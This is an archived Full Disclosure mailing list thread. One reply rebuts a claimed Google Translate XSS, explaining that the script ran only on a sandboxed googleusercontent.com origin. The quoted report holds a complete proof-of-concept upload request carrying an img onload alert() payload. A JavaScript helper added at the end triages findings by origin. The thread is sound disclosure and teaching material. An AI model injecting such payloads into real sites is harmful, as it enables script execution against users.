Full Disclosure mailing list archives
Re: Google Translator affected by Cross-Site Scripting vulnerability
From: Gynvael Coldwind <gynvael () coldwind pl>
Date: Fri, 27 Nov 2015 10:08:44 +0000
Hi Francisco,

Unfortunately your disclosure is factually wrong. Please note that even the packet you are citing says "Host: translate.googleusercontent.com" - this is not the same domain as translate.google.es (or translate.google.com), therefore, due to the JavaScript same-origin policy (https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) it's a different origin. Which means that scripts executed from translate.googleusercontent.com do not have access to cookies/DOM/etc. of Google Translate main domains (translate.google.es, etc.). And there are no interesting cookies / things to do on translate.googleusercontent.com.

Given the above, as Google surely told you, you didn't find an XSS in Google Translate, you found an XSS in a sandbox domain, which was designed to allow execution of potentially hostile JavaScript code. Hey, you can even find the *.googleusercontent.com domain in Google's sandboxed domain listing: https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain

Keep in mind that when doing XSS-related security research a popping-up alert box tells you that you can execute code, but not whether it's a vulnerability - for that you need to verify the domain (and maybe schema/port as well, depending on your case), e.g. by doing alert(document.domain) instead of alert('XSS en Google AUDIT') ;)

Cheers,
Gynvael

On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez <franciscojaviersantiagovazquez () gmail com> wrote:
I. VULNERABILITY
-------------------------
Vulnerability: Cross-Site Scripting
Google Translator affected by Cross-Site Scripting vulnerability (XSS)
Google assumes the vulnerability.

II. DESCRIPTION
-------------------------
- Firstly, go to the https://translate.google.es/?hl=es website and click on "Document Translate"
- Upload the proof of concept
- Finally, we can display the Cross-Site Scripting (XSS)

III. PROOF OF CONCEPT
-------------------------
POST /translate_f HTTP/1.1
Host: translate.googleusercontent.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://translate.google.es/?hl=es
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------147452561017500
Content-Length: 1095

-----------------------------147452561017500
Content-Disposition: form-data; name="sl"

en
-----------------------------147452561017500
Content-Disposition: form-data; name="tl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="js"

y
-----------------------------147452561017500
Content-Disposition: form-data; name="prev"

_t
-----------------------------147452561017500
Content-Disposition: form-data; name="hl"

es
-----------------------------147452561017500
Content-Disposition: form-data; name="ie"

UTF-8
-----------------------------147452561017500
Content-Disposition: form-data; name="text"

-----------------------------147452561017500
Content-Disposition: form-data; name="file"; filename="poc.html"
Content-Type: text/html

<img src=" http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg " onload="alert('XSS en Google AUDIT')"</img>
-----------------------------147452561017500
Content-Disposition: form-data; name="edit-text"

-----------------------------147452561017500--

IV. SYSTEMS AFFECTED
-------------------------
The vulnerability affects the Google Translator.

VI. CREDITS
-------------------------
These vulnerabilities have been discovered by Francisco Javier Santiago Vázquez (https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050) (https://twitter.com/n0ipr0cs).

VII. DISCLOSURE TIMELINE
-------------------------
Nov 02, 2015: Vulnerability acquired by Francisco Javier Santiago Vázquez, aka "n0ipr0cs"
Nov 03, 2015: Responsible disclosure to Google Security Team.
Nov 03, 2015: Google assumes the vulnerability
Nov 26, 2015: Disclosure

VIII. LINKS
------------------------
POC: http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html

Francisco Javier Santiago Vázquez
Ethical Hacker and Forensic Analyst
<http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
<http://estacioninformatica.blogspot.com.es/>
<https://twitter.com/n0ipr0cs>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
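The origin check Gynvael recommends (alert(document.domain) rather than a bare alert), written out as a small triage helper. This is an added example, not code from either poster: it compares the origin where a payload executed against the origin of the application a report names, using the same-origin policy's scheme/host/port rule, and labels the result. The sandbox host list is an assumption for the example, not Google's own list.

```javascript
// Added example: triage an XSS finding by origin, as the reply above advises.
// Under the same-origin policy an origin is (scheme, host, port); a payload
// running on translate.googleusercontent.com cannot read cookies or DOM of
// translate.google.es, so those two are different origins even though both
// hosts belong to Google.

// Port implied by a scheme when the URL does not spell one out.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

// Return the (scheme, host, port) triple for a URL, filling in the default port.
function originOf(urlString) {
  const u = new URL(urlString);
  return {
    scheme: u.protocol,
    host: u.hostname.toLowerCase(),
    port: u.port || DEFAULT_PORTS[u.protocol] || "",
  };
}

// True only if both URLs share scheme, host and port.
function sameOrigin(a, b) {
  const x = originOf(a), y = originOf(b);
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// executedAt: the URL (or document.domain/location) seen when the payload
// fired; targetApp: the origin of the application the report claims is at
// risk; sandboxHosts: known sandbox domains (assumed list for this example).
function triageXss(executedAt, targetApp, sandboxHosts) {
  if (sameOrigin(executedAt, targetApp)) {
    return "xss-on-target-origin";
  }
  const host = originOf(executedAt).host;
  const isSandbox = sandboxHosts.some(
    (s) => host === s || host.endsWith("." + s)
  );
  return isSandbox ? "xss-in-sandbox-domain" : "xss-on-unrelated-origin";
}

// Constructed inputs mirroring the thread: the payload ran on the
// googleusercontent.com host while the report names translate.google.es.
const SANDBOX_HOSTS = ["googleusercontent.com"]; // assumption, not Google's list
const verdict = triageXss(
  "https://translate.googleusercontent.com/translate_f",
  "https://translate.google.es/?hl=es",
  SANDBOX_HOSTS
);
console.log(verdict); // xss-in-sandbox-domain
```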
Current thread:
- Google Translator affected by Cross-Site Scripting vulnerability Francisco Javier Santiago Vázquez (Nov 27)
- Re: Google Translator affected by Cross-Site Scripting vulnerability Gynvael Coldwind (Nov 28)